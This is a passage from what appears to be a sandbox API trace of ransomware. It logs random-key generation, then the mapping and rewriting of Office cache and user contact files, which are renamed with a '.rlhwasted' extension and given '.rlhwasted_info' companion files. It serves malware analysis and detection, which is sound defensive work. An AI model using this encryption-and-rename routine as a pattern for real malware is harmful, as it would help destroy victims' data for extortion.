pbBuffer=0x6ed220 | out: pbBuffer=0x6ed220) returned 1 [0185.637] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.637] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.638] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.638] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.647] SetEndOfFile (hFile=0x124) returned 1 [0185.650] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0185.650] CloseHandle (hObject=0x124) returned 1 [0185.656] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0185.656] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed428 | out: hHeap=0x6b0000) returned 1 [0185.657] _aulldvrm () returned 0x0 [0185.657] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.658] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.658] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.658] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0185.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0185.658] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.658] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0185.658] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.659] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0185.659] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.659] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.660] WriteFile (in: hFile=0x124, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.662] SetEndOfFile (hFile=0x124) returned 1 [0185.662] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0185.662] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.rlhwasted")) returned 1 [0185.703] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0185.703] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0185.703] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1915 [0185.703] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1915) returned 0x6a0000 [0185.704] CloseHandle (hObject=0x128) returned 1 [0185.746] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.747] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.747] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.747] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.748] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.748] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.757] SetEndOfFile (hFile=0x124) returned 1 [0185.760] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.760] CloseHandle (hObject=0x124) returned 1 [0185.765] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0185.765] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed0d8 | out: hHeap=0x6b0000) returned 1 [0185.765] _aulldvrm () returned 0x0 [0185.765] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.766] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.766] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.766] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0185.766] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x6d4580 [0185.766] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.767] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0185.767] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.767] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0185.767] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.768] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.768] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.769] SetEndOfFile (hFile=0x124) returned 1 [0185.770] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.770] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0185.770] lstrcpyW (in: lpString1=0x6d4636, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted")) returned 1 [0185.862] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.862] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0185.862] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xaec3a [0185.884] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec3a) returned 0x12b0000 [0185.884] CloseHandle (hObject=0x10c) returned 1 [0185.914] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.915] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.915] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.916] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.916] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.916] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.944] SetEndOfFile (hFile=0x124) returned 1 [0185.947] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.947] CloseHandle (hObject=0x124) returned 1 [0185.957] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.957] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ed528 | out: hHeap=0x6b0000) returned 1 [0185.957] _aulldvrm () returned 0x0 [0185.957] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.958] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.958] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0185.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6d4580 [0185.959] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.959] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0185.959] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.960] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0185.960] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.960] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.961] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.962] SetEndOfFile (hFile=0x124) returned 1 [0185.963] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.963] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0185.963] lstrcpyW (in: lpString1=0x6d461e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.rlhwasted")) returned 1 [0185.964] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0185.964] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0185.964] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x2213 [0185.964] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2213) returned 0x6a0000 [0185.964] CloseHandle (hObject=0x104) returned 1 [0185.976] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.977] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.977] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.977] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.978] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.978] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.990] SetEndOfFile (hFile=0x124) returned 1 [0186.004] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.004] CloseHandle (hObject=0x124) returned 1 [0186.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0186.017] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee4d0 | out: hHeap=0x6b0000) returned 1 [0186.017] _aulldvrm () returned 0x0 [0186.017] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0186.018] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.018] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0186.019] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0186.019] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.019] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.019] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0186.020] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.020] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.021] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.022] SetEndOfFile (hFile=0x124) returned 1 [0186.022] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.022] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.022] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.rlhwasted")) returned 1 [0186.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0186.023] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0186.023] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x10b1e [0186.024] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b1e) returned 0xb00000 [0186.024] CloseHandle (hObject=0x108) returned 1 [0186.034] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0186.035] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.035] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.035] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0186.036] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.036] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.047] SetEndOfFile (hFile=0x124) returned 1 [0186.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.050] CloseHandle (hObject=0x124) returned 1 [0186.052] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0186.052] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5a28 | out: hHeap=0x6b0000) returned 1 [0186.053] _aulldvrm () returned 0x0 [0186.053] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0186.054] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0186.054] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0186.054] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28a) returned 0x6d4580 [0186.054] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0186.054] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0186.054] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0186.055] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0186.076] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0186.077] WriteFile (in: hFile=0x124, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0186.078] SetEndOfFile (hFile=0x124) returned 1 [0186.078] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0186.078] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.078] lstrcpyW (in: lpString1=0x6d4600, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0186.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.rlhwasted")) returned 1 [0186.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0186.080] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0186.080] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x493 [0186.080] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x493) returned 0x6a0000 [0186.080] CloseHandle (hObject=0x110) returned 1 [0186.605] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0186.606] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0186.606] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.606] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0186.607] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0186.607] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0186.618] SetEndOfFile (hFile=0x124) returned 1 [0186.621] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0186.621] CloseHandle (hObject=0x124) returned 1 [0186.624] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0186.624] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8990 | out: hHeap=0x6b0000) returned 1 [0186.624] 